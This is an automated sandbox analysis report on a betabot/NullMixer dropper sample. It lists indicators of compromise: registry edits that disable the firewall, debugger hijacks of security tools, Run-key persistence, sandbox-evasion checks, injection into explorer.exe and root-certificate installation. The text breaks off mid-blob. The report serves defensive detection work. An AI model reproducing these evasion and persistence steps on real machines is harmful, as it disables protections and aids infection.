betabot | 5bbc833edf2e7c061fd34fe1aba85ff56746dbe0875eafcc945c264ac45193ae

Windows Service

T1543.003

Processes:

o55o75gcq_1.exeexplorer.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	o55o75gcq_1.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0"	o55o75gcq_1.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	explorer.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0"	explorer.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	o55o75gcq_1.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	o55o75gcq_1.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Processes:

regedit.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath regedit.exe
NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath	regedit.exe

OnlyLogger payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2208-179-0x0000000000240000-0x000000000026F000-memory.dmp	family_onlylogger
behavioral1/memory/2208-188-0x0000000000400000-0x0000000001D81000-memory.dmp	family_onlylogger
behavioral1/memory/2208-293-0x0000000000400000-0x0000000001D81000-memory.dmp	family_onlylogger

Vidar Stealer 4 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/2148-135-0x0000000001E40000-0x0000000001EDD000-memory.dmp	family_vidar
behavioral1/memory/2148-139-0x0000000000400000-0x0000000001DCA000-memory.dmp	family_vidar
behavioral1/memory/2148-292-0x0000000000400000-0x0000000001DCA000-memory.dmp	family_vidar
behavioral1/memory/2148-296-0x0000000001E40000-0x0000000001EDD000-memory.dmp	family_vidar

Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Looks for VMWare services registry key. 1 TTPs 4 IoCs

evasion

Virtualization/Sandbox Evasion

T1497

Processes:

setup_installer.exesetup_2.tmpSun14c78e5159b8.exe3002.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	setup_installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	setup_2.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	Sun14c78e5159b8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	3002.exe

Sets file execution options in registry 2 TTPs 20 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

Processes:

explorer.exeo55o75gcq_1.exeregedit.exeABC9.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "avcrtigxmq.exe"	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe	o55o75gcq_1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe\Debugger = "zenicc.exe"	o55o75gcq_1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe\Debugger = "vgapdo.exe"	o55o75gcq_1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MRT.exe\Debugger = "lakjliyzbmg.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Mrtstub.exe	o55o75gcq_1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Mrtstub.exe\Debugger = "mgxehmqtwrk.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmgr108.exe	o55o75gcq_1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe	o55o75gcq_1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Mrtstub.exe\Debugger = "acvjqk.exe"	o55o75gcq_1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MRT.exe\Debugger = "mkdmow.exe"	o55o75gcq_1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mrtstub.exe	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmgr108.exe\Debugger = "zrfbkkwh.exe"	o55o75gcq_1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\o55o75gcq.exe	ABC9.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\o55o75gcq.exe\DisableExceptionChainValidation	ABC9.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MRT.exe	o55o75gcq_1.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "vhgdewvohgt.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MRT.exe	regedit.exe

Sets service image path in registry 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1547.001

Modify Registry
T1112

Processes:

regedit.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath regedit.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath	regedit.exe

ASPack v2.12-2.42 5 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC9932946\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC9932946\libstdc++-6.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zSC9932946\libstdc++-6.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zSC9932946\libcurl.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zSC9932946\libcurlpp.dll	aspack_v212_v242

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

explorer.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorer.exe

Executes dropped EXE 27 IoCs

Processes:

setup_installer.exesetup_install.exeSun14eb4b7c17.exeSun1477d99f5afb5a49.exeSun1410432520b.exeSun14d2ba445ad3.exeSun14c031e6f3d78.exeSun14115415e7a48116.exeSun14c78e5159b8.exeSun1479047a006c5.exeSun1410432520b.tmpChrome 5.exePBrowFile594.exe2.exesetup.exesetup_2.exe3002.exesetup_2.tmpjhuuee.exe3002.exesetup_2.exesetup_2.tmpABC9.exeB839.exeservices64.exeo55o75gcq_1.exesihost64.exe

pid	process
2460	setup_installer.exe
2808	setup_install.exe
2620	Sun14eb4b7c17.exe
2860	Sun1477d99f5afb5a49.exe
856	Sun1410432520b.exe
2880	Sun14d2ba445ad3.exe
2148	Sun14c031e6f3d78.exe
1608	Sun14115415e7a48116.exe
1616	Sun14c78e5159b8.exe
1860	Sun1479047a006c5.exe
2220	Sun1410432520b.tmp
2272	Chrome 5.exe
2816	PBrowFile594.exe
2088	2.exe
2208	setup.exe
824	setup_2.exe
2392	3002.exe
2960	setup_2.tmp
2972	jhuuee.exe
2968	3002.exe
1672	setup_2.exe
2748	setup_2.tmp
588	ABC9.exe
680	B839.exe
2792	services64.exe
2908	o55o75gcq_1.exe
2124	sihost64.exe

Loads dropped DLL 64 IoCs

Processes:

720ac82bbf6ae7c41ea0630be8a40710.exesetup_installer.exesetup_install.execmd.exeSun14eb4b7c17.execmd.execmd.exeSun1477d99f5afb5a49.execmd.exeSun1410432520b.execmd.exeSun14c031e6f3d78.execmd.execmd.execmd.exeSun14c78e5159b8.exeSun1479047a006c5.exeSun1410432520b.tmpWerFault.exesetup.exesetup_2.exe3002.exesetup_2.tmp3002.exe

pid	process
2008	720ac82bbf6ae7c41ea0630be8a40710.exe
2460	setup_installer.exe
2460	setup_installer.exe
2460	setup_installer.exe
2460	setup_installer.exe
2460	setup_installer.exe
2460	setup_installer.exe
2808	setup_install.exe
2808	setup_install.exe
2808	setup_install.exe
2808	setup_install.exe
2808	setup_install.exe
2808	setup_install.exe
2808	setup_install.exe
2808	setup_install.exe
2508	cmd.exe
2508	cmd.exe
2620	Sun14eb4b7c17.exe
2620	Sun14eb4b7c17.exe
2196	cmd.exe
1272	cmd.exe
2860	Sun1477d99f5afb5a49.exe
2860	Sun1477d99f5afb5a49.exe
676	cmd.exe
856	Sun1410432520b.exe
856	Sun1410432520b.exe
524	cmd.exe
524	cmd.exe
2148	Sun14c031e6f3d78.exe
2148	Sun14c031e6f3d78.exe
1540	cmd.exe
760	cmd.exe
2600	cmd.exe
1616	Sun14c78e5159b8.exe
1616	Sun14c78e5159b8.exe
1860	Sun1479047a006c5.exe
1860	Sun1479047a006c5.exe
856	Sun1410432520b.exe
2220	Sun1410432520b.tmp
2220	Sun1410432520b.tmp
2220	Sun1410432520b.tmp
2348	WerFault.exe
2348	WerFault.exe
2348	WerFault.exe
1860	Sun1479047a006c5.exe
1860	Sun1479047a006c5.exe
2348	WerFault.exe
1860	Sun1479047a006c5.exe
1860	Sun1479047a006c5.exe
2208	setup.exe
1860	Sun1479047a006c5.exe
824	setup_2.exe
824	setup_2.exe
1860	Sun1479047a006c5.exe
1860	Sun1479047a006c5.exe
2392	3002.exe
2392	3002.exe
824	setup_2.exe
2392	3002.exe
2960	setup_2.tmp
2960	setup_2.tmp
2960	setup_2.tmp
2960	setup_2.tmp
2968	3002.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

Processes:

explorer.exe3002.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\o55o75gcq.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\o55o75gcq.exe\""	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\o55o75gcq.exe\""	3002.exe

Checks for any installed AV software in registry 1 TTPs 2 IoCs

Security Software Discovery

T1518.001

Processes:

o55o75gcq_1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\AntiVirService	o55o75gcq_1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\avast! Antivirus	o55o75gcq_1.exe

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

Processes:

ABC9.exe3002.exesetup_installer.exesetup_2.tmpo55o75gcq_1.exeSun14c78e5159b8.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ABC9.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3002.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup_installer.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup_2.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	o55o75gcq_1.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Sun14c78e5159b8.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

explorer.exe

description ioc process

File opened for modification C:\ProgramData\Java Updater\desktop.ini explorer.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

15 ip-api.com

description	ioc	process
File opened for modification	C:\ProgramData\Java Updater\desktop.ini	explorer.exe

flow	ioc
15	ip-api.com

Maps connected drives based on registry 3 TTPs 8 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

setup_2.tmpSun14c78e5159b8.exe3002.exesetup_installer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	setup_2.tmp
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	setup_2.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Sun14c78e5159b8.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	Sun14c78e5159b8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	3002.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	3002.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	setup_installer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	setup_installer.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 28 IoCs

Processes:

ABC9.exeexplorer.exe3002.exesetup_installer.exesetup_2.tmpo55o75gcq_1.exeSun14c78e5159b8.exe

pid	process
588	ABC9.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
2968	3002.exe
2968	3002.exe
2968	3002.exe
2968	3002.exe
2460	setup_installer.exe
2460	setup_installer.exe
2460	setup_installer.exe
2460	setup_installer.exe
1336	explorer.exe
1336	explorer.exe
2748	setup_2.tmp
2748	setup_2.tmp
2748	setup_2.tmp
2748	setup_2.tmp
1336	explorer.exe
1336	explorer.exe
2908	o55o75gcq_1.exe
1616	Sun14c78e5159b8.exe
1616	Sun14c78e5159b8.exe
1616	Sun14c78e5159b8.exe
1616	Sun14c78e5159b8.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

services64.exe

description pid process target process

PID 2792 set thread context of 1592 2792 services64.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 2792 set thread context of 1592	2792	services64.exe	explorer.exe

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2348	2808	WerFault.exe	setup_install.exe
2536	1860	WerFault.exe	Sun1479047a006c5.exe
872	2148	WerFault.exe	Sun14c031e6f3d78.exe
2280	2860	WerFault.exe	Sun1477d99f5afb5a49.exe
1072	2348	WerFault.exe	WerFault.exe
1700	2536	WerFault.exe	WerFault.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

Sun14eb4b7c17.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun14eb4b7c17.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun14eb4b7c17.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun14eb4b7c17.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

ABC9.exeexplorer.exeo55o75gcq_1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ABC9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ABC9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	explorer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	o55o75gcq_1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	o55o75gcq_1.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

2256 schtasks.exe
2436 schtasks.exe
2284 schtasks.exe

pid	process
2256	schtasks.exe
2436	schtasks.exe
2284	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	explorer.exe

Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs

Modify Registry

Processes:

explorer.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3"	explorer.exe

Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs

Modify Registry

Processes:

explorer.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1"	explorer.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

explorer.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main	explorer.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

Processes:

services64.exeSun14c031e6f3d78.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	services64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun14c031e6f3d78.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun14c031e6f3d78.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2